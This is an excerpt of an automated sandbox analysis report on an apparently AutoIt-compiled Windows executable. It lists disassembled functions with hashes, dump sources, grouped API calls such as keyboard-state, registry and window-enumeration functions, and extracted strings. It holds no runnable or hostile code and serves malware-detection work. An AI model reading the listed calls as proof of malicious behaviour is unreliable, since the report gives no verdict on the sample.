                                                                                                          • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                          • Instruction Fuzzy Hash: E3818022A18A8286EB54DF19D8606FD73A0FB45F84F840036EB4E87A9ADF7DDD45C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                          • String ID: P
                                                                                                          • API String ID: 1460738036-3110715001
                                                                                                          • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                          • Instruction ID: 251cc79462f1baebc8705608ea22577e09ac8184f40fb8647f08cccb9e1ea6e0
                                                                                                          • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                          • Instruction Fuzzy Hash: 6471E126A0868286F761DF2894642FD27A1FB96F48F544035DB4E8769BCE7CEC46C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadStringwprintf
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 3297454147-3080491070
                                                                                                          • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                          • Instruction ID: 5b1559451e49a07bac2950def3579068bda8bb693bf31865e293da002420eb13
                                                                                                          • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                          • Instruction Fuzzy Hash: 6E617F22B18A4296EB00DB69E8615ED6761FB46F44F901032EB4D9369FCF7DED06C740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 4051287042-2268648507
                                                                                                          • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                          • Instruction ID: 12c8ca1f3654e625b5aa502bb870cb28543a91cd368d41db66cdd675cee78b23
                                                                                                          • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                          • Instruction Fuzzy Hash: CE518121B18A4691EB00EB69E8614FD6761FF96B54B801032EB0D8369FDFBDED06C740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 3935177441-3405671355
                                                                                                          • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                          • Instruction ID: 837e107a24fdb5ec4706db6b8144e3236746b845a9294f42f63fd2a178f03319
                                                                                                          • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                          • Instruction Fuzzy Hash: 57312D25A09A0786F7109B2EF875BF52262AF96F44F444035D70E866DBCF2CAC858700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974058525-0
                                                                                                          • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                                          • Instruction ID: 47cbc5581192e679fcfd98dc7e3e5035db56a38a2623680c267903ff97a82d6d
                                                                                                          • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                                          • Instruction Fuzzy Hash: 7A914A26A09A0286EB659F19D4656F83760BF86F84F584135CB4EC739ECF3DEC418710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 1561581874-1000479233
                                                                                                          • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                          • Instruction ID: 506a9cf2e655b914a32afe05eaa52ecc267810c8fb461eefc02911eccd86589e
                                                                                                          • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                          • Instruction Fuzzy Hash: 8FD1E122E0869685EA24AB1DD5601FAA3A0FB56FD4F404231EB5D937DEDF3CED458300
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 1412819556-679674701
                                                                                                          • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                          • Instruction ID: e1bd31f0978cc4e71321c170bd42bc24cb26b3c879b7322b9df7fcb7463adfad
                                                                                                          • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                          • Instruction Fuzzy Hash: 5EB1D372B0868696EB29CB29D864AF97760FB56F84F400031DB1D8778BDF39E955C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                          • String ID: ThumbnailClass
                                                                                                          • API String ID: 4010642439-1241985126
                                                                                                          • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                          • Instruction ID: 5a1c3a27641b60af05de98c65fef097da8281f79422df747264be6dfe8edd6ca
                                                                                                          • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                          • Instruction Fuzzy Hash: 3FA1B522B0864787EA248F19D4646F96761FB96B84F408035CB9E83A9BDF3DFD05CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                          • String ID: P
                                                                                                          • API String ID: 1268354404-3110715001
                                                                                                          • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                          • Instruction ID: 850ec75ab312fe8b064e4a7c59bf303f1fc6533fef292b10ca0d64d1c7407347
                                                                                                          • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                          • Instruction Fuzzy Hash: 2561A236A08A418AEB549F2998616F927A0FB86F98F144535DF0E8379EDF3DE8408700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadStringwprintf
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 3297454147-2391861430
                                                                                                          • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                          • Instruction ID: ca6a730a61b201f121f56354ad85355b10bc7bbb4b9710467dbe654fdd823e05
                                                                                                          • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                          • Instruction Fuzzy Hash: 2571A322B18A4296EB40DB69D8614E96760FF46F84F801032EB0D9769FDF7DED06C740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 3030280669-22481851
                                                                                                          • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                          • Instruction ID: e30fdbf16c80a895a2c6fc5020a3dbb0f16d1e33fe91a37474cc3445b20c737f
                                                                                                          • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                          • Instruction Fuzzy Hash: 8051DB22718A8395EB10DF69E8A05ED67A0FB85B84F405031EB0D87ABEDF7CD985C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255039815-0
                                                                                                          • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                          • Instruction ID: 528b507776aaa66ffda24dc2ba12ab3bfef538891f0136747bbf35cce7ead536
                                                                                                          • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                          • Instruction Fuzzy Hash: 4261AC62B146528AEB10CF69D8609EC37A4BB46F88B145036DF5E9BBDEDF38D845C340
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                          • Instruction ID: 75b53f7151ccfdd41714a95bede87f2a29d3af09bbe0f507a468a6cdc7e7b44d
                                                                                                          • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                          • Instruction Fuzzy Hash: 87417161E0C6C555FB719B6894207F92BE0EF27F44F888039D789831CBCE9DAC9483A1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF6B5B26838: CreateFileW.KERNELBASE ref: 00007FF6B5B268A2
                                                                                                            • Part of subcall function 00007FF6B5B44380: GetCurrentDirectoryW.KERNEL32(?,00007FF6B5B2E817), ref: 00007FF6B5B4439C
                                                                                                            • Part of subcall function 00007FF6B5B256D4: GetFullPathNameW.KERNEL32(?,00007FF6B5B256C1,?,00007FF6B5B27A0C,?,?,?,00007FF6B5B2109E), ref: 00007FF6B5B256FF
                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5B2E8B0
                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5B2E9FA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                          • API String ID: 2207129308-1018226102
                                                                                                          • Opcode ID: 9e353b9dea71d8b148a77ae9d5417696022b9ba423a55aa08e3b4c2b264401ec
                                                                                                          • Instruction ID: 1e06410e8d5c084e66b755c6b5bb1adbebf75c2cd596131d5000e0746fa7a149
                                                                                                          • Opcode Fuzzy Hash: 9e353b9dea71d8b148a77ae9d5417696022b9ba423a55aa08e3b4c2b264401ec
                                                                                                          • Instruction Fuzzy Hash: 7A12A422A1868286EB50DF29D4611FE6760FB86B94F800132EB4D87A9FDF7DD945CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 636576611-1287834457
                                                                                                          • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                          • Instruction ID: 9cb8f6a4497280a01777a41585da5106701f992e951318f91be9d6122247a89a
                                                                                                          • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                          • Instruction Fuzzy Hash: 87716126A04A4685EB14AF2AD4A01FD2760FF46F98F545436DF0E877AADF78EC46C340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                          • API String ID: 3215553584-2617248754
                                                                                                          • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                          • Instruction ID: bd94b5a823eddc4882d783d8a7070508a94c093d4bfdbd9aaa726fe69bf1ca06
                                                                                                          • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                          • Instruction Fuzzy Hash: 6A419F72A06B4589FB54CF29E8617E933A4EB09B98F404235EF5C47B9ADE3CD915C340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
